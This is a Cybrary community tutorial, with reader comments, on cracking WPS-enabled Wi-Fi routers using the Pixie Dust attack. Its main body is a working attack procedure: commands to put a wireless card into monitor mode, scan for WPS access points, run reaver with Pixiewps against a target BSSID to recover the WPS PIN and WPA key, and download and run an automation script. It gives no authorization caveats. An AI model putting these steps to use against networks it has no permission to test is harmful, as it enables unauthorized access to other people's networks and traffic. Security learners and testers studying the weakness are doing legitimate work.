Hacking WPS via Pixie Dust Attack

April 22, 2016 | Views: 63140

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

This Cybrary 0P3N submission will cover how to use tools such as aircrack suite, Reaver, Pixiewps, & HT-WPS#B to exploit a WPS vulnerability in certain routers.

This attack is carried out on a Machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools aside from HT-WPS#B).

Here is a list of vulnerable routers:
Spreadsheet of Routers Vulnerable to WPS Exploit

To start, open a terminal as root and run the following commands.


apt-get update

apt-get install reaver aircrack-ng


Once you have ran the following commands, we will use airmon-ng to set our wireless card into monitor mode. (Must have a wireless card capable of packet injection)

First we will check for any interfering processes by using the following command.


airmon-ng check


If processes were found, use the following command to kill them.


airmon-ng check kill


Now to set the card to monitor mode.


airmon-ng start wlan0


Next we will use airodump-ng to scan for wireless access points with WPS enabled.


airodump-ng wlan0mon --wps


Once airodump has found the AP you are attacking, press ctrl+C to stop, then copy down the BSSID & Channel #.

Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP.


reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1


-i specifies the interface used

-c specifies the channel of the AP. Replace # with the channel number.

-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.

You can also time the reaver process by using the following command.


time reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1


If successful, the WPS pin will be passed to reaver and the WPA key will be discovered.


Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.


Using HT-WPS-Breaker to automate the process.

To install, CLICK HERE then drag the .zip to your desktop and run the following commands.

  • cd Desktop
  • unzip HT-WPS-Breaker-master.zip
  • cd HT-WPS-Breaker-master
  • chmod +x HT-WB.sh
  • ./HT-WB.sh or bash HT-WB.sh


This concludes a simple write up of how to use Reaver and other tools to attack a WPS enabled AP.

I have had many questions on how to use Reaver so I hope this helps.

Comment below if you have any questions. (Please keep comments in regards to the topic).


Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Hi everybody!

    I created a kali live usb with persistence just a few days ago and tried the above commands. When i used apt-get install reaver aircrack-ng a message appears suggesting that reaver is already installed. Is that normal due to an updated kali version?

  2. was expecting something good from the post
    m little disappointed

    i was thinking this post will explain how actually pixie dust attack works

  3. How do you know if your wireless card is capable of packet injection? Do most wireless cards do this natively or do I need to purchase one that does?

  4. will try this out this weekend.

  5. Is it possible to realize this process in windows 10?

    • Use a unix based distro. Virtual machine works great as well. If you are using a USB wireless card, i highly suggest dual booting as you may run into problems with injection and or drivers.

Page 5 of 6« First...«23456»
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?